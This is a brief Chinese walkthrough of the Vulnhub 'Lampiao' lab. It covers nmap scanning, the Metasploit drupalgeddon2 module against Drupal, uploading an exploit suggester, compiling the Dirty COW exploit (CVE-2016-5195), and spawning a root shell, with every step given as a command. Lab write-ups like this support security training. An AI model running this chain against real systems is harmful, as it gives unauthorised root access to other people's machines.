Linux 脏牛漏洞提权 【Vulnhub靶场 Lampiao】
1.nmap 扫描主机
扫描同网段存活主机
扫描目标主机开放端口,扫描到开放了1898端口
nmap -p1-65535 192.168.61.138
2.发现web网站,搜集利用漏洞
通过开放的1898端口进入网站,看到目标网站,发现网站cms是drupal
msf 搜索drupal漏洞,使用可利用漏洞进行攻击
>search drupal
>use exploit/unix/webapp/drupal_drupalgeddon2
>set rhosts 192.168..61.138
>set rport 1898
>exploit
3.信息收集
上传信息收集脚本,发现存在脏牛提权漏洞
upload /tmp/linux-exploit-suggester.sh /tmp/xxsj.sh
进入shell 执行信息收集脚本,执行结果中发现【CVE-2016-5195】脏牛漏洞
shell
chmod 777 xxsj.sh
./xxsj.sh
4.漏洞利用
上传exp
upload /tmp/40847.cpp /tmp/exp.cpp
进入shell编译执行exp,得到登录密码
shell
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o exp exp.cpp -lutil
./exp
打开交互式shell,切换root用户,提权成功
python -c 'import pty; pty.spawn("/bin/bash")'